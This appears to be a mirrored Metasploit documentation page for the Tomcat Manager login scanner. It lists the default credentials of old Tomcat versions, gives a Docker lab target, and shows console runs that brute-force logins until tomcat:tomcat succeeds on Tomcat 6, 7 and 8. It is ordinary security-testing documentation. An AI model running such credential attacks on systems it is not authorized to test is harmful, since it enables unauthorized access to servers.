ContextQMD
Back to Metasploit Framework

Tomcat Mgr Login

documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md

6.4.1373.7 KB
Original Source

The auxiliary/scanner/http/tomcat_mgr_login works for Tomcat versions that uses HTTP authentication.

Please note that for Tomcat 7 or newer, the roles required to use the manager application were changed from the single manager role to the following four roles:

  • manager-gui - Allows access to the HTML GUI and the status pages.
  • manager-script - Allows access to the text interface and the status pages.
  • manager-jmx - Allows access to the JMX and the status pages.
  • manager-status - allows access to the status pages only.

Older versions of Tomcat came with default passwords enabled by default. For example:

Tomcat 4

UsernamePasswordRole
tomcattomcattomcat
role1tomcatrole1
bothtomcattomcat, role1

Tomcat 5

Same as Tomcat 4

Newer Tomcat versions have these passwords commented out.

If you are using the default Metasploit credential lists, these usernames and passwords are already loaded.

Vulnerable Application

A Docker target is available. Build and run it with:

docker build -t tomcat-msf-test test/tomcat/
docker run --rm -p 8080:8080 tomcat-msf-test

The test credentials are tomcat / tomcat.

To download the vulnerable application, you can find it here: https://tomcat.apache.org/whichversion.html.

Verification Steps

  1. Do: auxiliary/scanner/http/tomcat_mgr_login
  2. Do: set RHOSTS [IP]
  3. Set TARGETURI if necessary.
  4. Do: run

Scenarios

All scenarios are run with the credentials tomcat/tomcat.

Tomcat 6

Tomcat 6.0.48 running on Ubuntu 14.04

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set rport 8080
rport => 8080
msf auxiliary(tomcat_mgr_login) > set rhosts 192.168.2.156
rhosts => 192.168.2.156
msf auxiliary(tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 192.168.2.156:8080 - LOGIN FAILED: admin:admin (Incorrect)

...snip...

[-] 192.168.2.156:8080 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.2.156:8080 - LOGIN SUCCESSFUL: tomcat:tomcat
[-] 192.168.2.156:8080 - LOGIN FAILED: both:admin (Incorrect)

...snip...

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Tomcat 7

Tomcat 7.0.68 running on Windows XP

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set rport 8087
rport => 8087
msf auxiliary(tomcat_mgr_login) > set rhosts 192.168.2.108
rhosts => 192.168.2.108
msf auxiliary(tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 192.168.2.108:8087 - LOGIN FAILED: admin:admin (Incorrect)

...snip...

[-] 192.168.2.108:8087 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.2.108:8087 - LOGIN SUCCESSFUL: tomcat:tomcat
[-] 192.168.2.108:8087 - LOGIN FAILED: both:admin (Incorrect)

...snip...

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Tomcat 8

Tomcat 8.0.32 running on Windows XP

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set rhosts 192.168.2.108
rhosts => 192.168.2.108
msf auxiliary(tomcat_mgr_login) > set rport 8088
rport => 8088
msf auxiliary(tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 192.168.2.108:8088 - LOGIN FAILED: admin:admin (Incorrect)

...snip...

[-] 192.168.2.108:8088 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.2.108:8088 - LOGIN SUCCESSFUL: tomcat:tomcat
[-] 192.168.2.108:8088 - LOGIN FAILED: both:admin (Incorrect)

...snip...

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed